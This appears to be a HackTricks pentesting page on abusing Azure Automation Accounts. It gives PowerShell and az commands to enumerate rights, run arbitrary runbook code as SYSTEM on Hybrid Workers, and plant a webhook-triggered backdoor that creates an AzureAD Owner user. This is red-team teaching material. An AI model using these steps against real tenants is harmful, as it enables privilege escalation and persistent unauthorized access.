Support HackTricks and get benefits!
- If you want to see your company advertised in HackTricks or if you want access to the latest version of the PEASS or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Azure Automation delivers a cloud-based automation, operating system updates, and configuration service that supports consistent management across your Azure and non-Azure environments. It includes process automation, configuration management, update management, shared capabilities, and heterogeneous features.
These are like "scheduled tasks" in Azure that will let you execute things (actions or even scripts) to manage, check and configure the Azure environment.
When Run as Account is used, it creates an Azure AD application with self-signed certificate, creates a service principal and assigns the Contributor role for the account in the current subscription (a lot of privileges).
Microsoft recommends using a Managed Identity for Automation Account.
{% hint style="warning" %} This will be removed on September 30, 2023 and changed for Managed Identities. {% endhint %}
Runbooks allows you to execute arbitrary PowerShell code. This could be abused by an attacker to steal the permissions of the attached principal (if any).
In the code of Runbooks you could also find sensitive info (such as creds).
If you can read the jobs, do it as they contain the output of the run (potential sensitive info).
A Runbook can be run in a container inside Azure or in a Hybrid Worker.
The Log Analytics Agent is deployed on the VM to register it as a hybrid worker.
The hybrid worker jobs run as SYSTEM on Windows and nxautomation account on Linux.
Each Hybrid Worker is registered in a Hybrid Worker Group.
Therefore, if you can choose to run a Runbook in a Windows Hybrid Worker, you will execute arbitrary commands inside that machine as System.
Azure Automation State Configuration is an Azure configuration management service that allows you to write, manage, and compile PowerShell Desired State Configuration (DSC) configurations for nodes in any cloud or on-premises datacenter. The service also imports DSC Resources, and assigns configurations to target nodes, all in the cloud. You can access Azure Automation State Configuration in the Azure portal by selecting State configuration (DSC) under Configuration Management.
It's possible to abuse SC to run arbitrary scripts in the managed machines.
{% content-ref url="az-state-configuration-rce.md" %} az-state-configuration-rce.md {% endcontent-ref %}
# Check user right for automation
az extension add --upgrade -n automation
az automation account list # if it doesn't return anything the user is not a part of an Automation group# Get the role of a user on the Automation account
# Contributor or higher = Can create and execute Runbooks
Get-AzRoleAssignment -Scope /subscriptions/<ID>/resourceGroups/<RG-NAME>/providers/Microsoft.Automation/automationAccounts/<AUTOMATION-ACCOUNT>
# List hybrid workers
Get-AzAutomationHybridWorkerGroup -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME>
# Create a Powershell Runbook
Import-AzAutomationRunbook -Name <RUNBOOK-NAME> -Path C:\Tools\username.ps1 -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Type PowerShell -Force -Verbose
# Publish the Runbook
Publish-AzAutomationRunbook -RunbookName <RUNBOOK-NAME> -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Verbose
# Start the Runbook
Start-AzAutomationRunbook -RunbookName <RUNBOOK-NAME> -RunOn Workergroup1 -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Verbose-
Create a new Automation Account
- "Create Azure Run As account": Yes
-
Import a new runbook that creates an AzureAD user with Owner permissions for the subscription
- Sample runbook for this Blog located here – https://github.com/NetSPI/MicroBurst
- Publish the runbook
- Add a webhook to the runbook
-
Add the AzureAD module to the Automation account
- Update the Azure Automation Modules
-
Assign "User Administrator" and "Subscription Owner" rights to the automation account
-
Eventually lose your access…
-
Trigger the webhook with a post request to create the new user
$uri = "https://s15events.azure-automation.net/webhooks?token=h6[REDACTED]%3d" $AccountInfo = @(@{RequestBody=@{Username="BackdoorUsername";Password="BackdoorPassword"}}) $body = ConvertTo-Json -InputObject $AccountInfo $response = Invoke-WebRequest -Method Post -Uri $uri -Body $body
- https://learn.microsoft.com/en-us/azure/automation/overview
- https://learn.microsoft.com/en-us/azure/automation/automation-dsc-overview
- https://github.com/rootsecdev/Azure-Red-Team#runbook-automation
Support HackTricks and get benefits!
- If you want to see your company advertised in HackTricks or if you want access to the latest version of the PEASS or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.